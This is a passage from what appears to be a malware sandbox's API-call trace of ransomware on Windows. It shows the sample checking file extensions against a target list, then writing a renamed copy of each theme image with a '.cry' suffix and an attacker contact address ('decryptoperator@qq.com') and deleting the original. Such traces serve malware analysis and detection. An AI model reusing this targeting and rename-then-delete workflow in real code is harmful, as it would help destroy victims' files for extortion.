Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.006] lstrlenW (lpString=".zip") returned 4 [0045.006] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.006] lstrlenW (lpString=".rar") returned 4 [0045.006] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.006] lstrlenW (lpString=".bz2") returned 4 [0045.006] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.006] lstrlenW (lpString=".7z") returned 3 [0045.006] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.006] lstrlenW (lpString=".dbf") returned 4 [0045.006] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.006] lstrlenW (lpString=".1cd") returned 4 [0045.006] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.006] lstrlenW (lpString=".jpg") returned 4 [0045.006] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.007] lstrlenW (lpString=".doc") returned 4 [0045.007] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.007] lstrlenW (lpString=".docx") returned 5 [0045.007] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.007] lstrlenW (lpString=".pdf") returned 4 [0045.007] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.007] lstrlenW (lpString=".xls") returned 4 [0045.007] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.007] lstrlenW (lpString=".xlsx") returned 5 [0045.007] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.007] lstrlenW (lpString=".ppt") returned 4 [0045.007] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.007] lstrlenW (lpString=".zip") returned 4 [0045.007] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.007] lstrlenW (lpString=".rar") returned 4 [0045.007] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.007] lstrlenW (lpString=".bz2") returned 4 [0045.007] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.007] lstrlenW (lpString=".7z") returned 3 [0045.007] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.007] lstrlenW (lpString=".dbf") returned 4 [0045.007] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.007] lstrlenW (lpString=".1cd") returned 4 [0045.007] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.007] lstrlenW (lpString=".jpg") returned 4 [0045.007] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.007] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0045.008] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.008] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0045.587] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=26402) returned 1 [0045.587] CloseHandle (hObject=0x204) returned 1 [0045.587] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png")) returned 0x20 [0045.587] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.587] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0045.587] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.588] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.588] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0045.588] GetLastError () returned 0x0 [0045.588] ReadFile (in: hFile=0x204, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x6722, lpOverlapped=0x0) returned 1 [0045.612] WriteFile (in: hFile=0x208, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x6730, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x6730, lpOverlapped=0x0) returned 1 [0045.613] ReadFile (in: hFile=0x204, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.613] WriteFile (in: hFile=0x208, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.613] SetEndOfFile (hFile=0x208) returned 1 [0045.613] CloseHandle (hObject=0x208) returned 1 [0045.613] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.613] SetEndOfFile (hFile=0x204) returned 1 [0045.614] CloseHandle (hObject=0x204) returned 1 [0045.614] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.614] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png")) returned 1 [0045.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.614] lstrlenW (lpString=".doc") returned 4 [0045.614] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.614] lstrlenW (lpString=".docx") returned 5 [0045.614] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.614] lstrlenW (lpString=".pdf") returned 4 [0045.614] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.614] lstrlenW (lpString=".xls") returned 4 [0045.614] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.614] lstrlenW (lpString=".xlsx") returned 5 [0045.614] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.615] lstrlenW (lpString=".ppt") returned 4 [0045.615] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.615] lstrlenW (lpString=".zip") returned 4 [0045.615] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.615] lstrlenW (lpString=".rar") returned 4 [0045.615] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.615] lstrlenW (lpString=".bz2") returned 4 [0045.615] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.615] lstrlenW (lpString=".7z") returned 3 [0045.620] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.629] lstrlenW (lpString=".dbf") returned 4 [0045.629] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.629] lstrlenW (lpString=".1cd") returned 4 [0045.629] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.629] lstrlenW (lpString=".jpg") returned 4 [0045.629] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.629] lstrlenW (lpString=".doc") returned 4 [0045.629] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.629] lstrlenW (lpString=".docx") returned 5 [0045.629] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.630] lstrlenW (lpString=".pdf") returned 4 [0045.630] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.630] lstrlenW (lpString=".xls") returned 4 [0045.630] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.630] lstrlenW (lpString=".xlsx") returned 5 [0045.630] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.630] lstrlenW (lpString=".ppt") returned 4 [0045.630] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.630] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.630] lstrlenW (lpString=".zip") returned 4 [0045.630] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.630] lstrlenW (lpString=".rar") returned 4 [0045.630] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.630] lstrlenW (lpString=".bz2") returned 4 [0045.630] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.630] lstrlenW (lpString=".7z") returned 3 [0045.630] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.630] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.630] lstrlenW (lpString=".dbf") returned 4 [0045.630] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.630] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.630] lstrlenW (lpString=".1cd") returned 4 [0045.630] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.630] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.630] lstrlenW (lpString=".jpg") returned 4 [0045.630] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.630] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0045.630] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.630] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0045.631] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=2574) returned 1 [0045.631] CloseHandle (hObject=0x204) returned 1 [0045.631] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif")) returned 0x20 [0045.631] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.631] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0045.631] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.631] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.631] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0045.678] GetLastError () returned 0x0 [0045.678] ReadFile (in: hFile=0x204, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0xa0e, lpOverlapped=0x0) returned 1 [0045.680] WriteFile (in: hFile=0x1fc, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xa10, lpOverlapped=0x0) returned 1 [0045.680] ReadFile (in: hFile=0x204, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.680] WriteFile (in: hFile=0x1fc, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.681] SetEndOfFile (hFile=0x1fc) returned 1 [0045.681] CloseHandle (hObject=0x1fc) returned 1 [0045.681] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.681] SetEndOfFile (hFile=0x204) returned 1 [0045.681] CloseHandle (hObject=0x204) returned 1 [0045.682] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.682] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif")) returned 1 [0045.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0045.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0045.682] lstrlenW (lpString=".doc") returned 4 [0045.682] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.682] lstrlenW (lpString=".docx") returned 5 [0045.682] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.682] lstrlenW (lpString=".pdf") returned 4 [0045.682] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.682] lstrlenW (lpString=".xls") returned 4 [0045.682] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.682] lstrlenW (lpString=".xlsx") returned 5 [0045.682] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.682] lstrlenW (lpString=".ppt") returned 4 [0045.682] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0045.682] lstrlenW (lpString=".zip") returned 4 [0045.682] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.682] lstrlenW (lpString=".rar") returned 4 [0045.682] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.682] lstrlenW (lpString=".bz2") returned 4 [0045.682] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.683] lstrlenW (lpString=".7z") returned 3 [0045.683] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0045.683] lstrlenW (lpString=".dbf") returned 4 [0045.683] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0045.683] lstrlenW (lpString=".1cd") returned 4 [0045.683] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0045.683] lstrlenW (lpString=".jpg") returned 4 [0045.683] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0045.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0045.683] lstrlenW (lpString=".doc") returned 4 [0045.683] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.683] lstrlenW (lpString=".docx") returned 5 [0045.683] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.683] lstrlenW (lpString=".pdf") returned 4 [0045.683] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.683] lstrlenW (lpString=".xls") returned 4 [0045.683] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.683] lstrlenW (lpString=".xlsx") returned 5 [0045.683] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.683] lstrlenW (lpString=".ppt") returned 4 [0045.683] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0045.683] lstrlenW (lpString=".zip") returned 4 [0045.683] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.683] lstrlenW (lpString=".rar") returned 4 [0045.683] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.683] lstrlenW (lpString=".bz2") returned 4 [0045.683] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.683] lstrlenW (lpString=".7z") returned 3 [0045.683] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0045.683] lstrlenW (lpString=".dbf") returned 4 [0045.683] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0045.684] lstrlenW (lpString=".1cd") returned 4 [0045.684] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.684] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0045.684] lstrlenW (lpString=".jpg") returned 4 [0045.684] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.684] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0045.684] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.684] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0045.687] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=21745) returned 1 [0045.687] CloseHandle (hObject=0x1fc) returned 1 [0045.687] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png")) returned 0x20 [0045.687] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.687] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0045.687] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.688] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.688] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0045.688] GetLastError () returned 0x0 [0045.688] ReadFile (in: hFile=0x1fc, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x54f1, lpOverlapped=0x0) returned 1 [0045.712] WriteFile (in: hFile=0x20c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x5500, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x5500, lpOverlapped=0x0) returned 1 [0045.713] ReadFile (in: hFile=0x1fc, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.713] WriteFile (in: hFile=0x20c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.713] SetEndOfFile (hFile=0x20c) returned 1 [0045.716] CloseHandle (hObject=0x20c) returned 1 [0045.716] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.716] SetEndOfFile (hFile=0x1fc) returned 1 [0045.717] CloseHandle (hObject=0x1fc) returned 1 [0045.717] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.717] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png")) returned 1 [0045.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0045.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0045.718] lstrlenW (lpString=".doc") returned 4 [0045.718] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.718] lstrlenW (lpString=".docx") returned 5 [0045.718] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.718] lstrlenW (lpString=".pdf") returned 4 [0045.718] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.718] lstrlenW (lpString=".xls") returned 4 [0045.718] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.718] lstrlenW (lpString=".xlsx") returned 5 [0045.718] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.718] lstrlenW (lpString=".ppt") returned 4 [0045.718] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 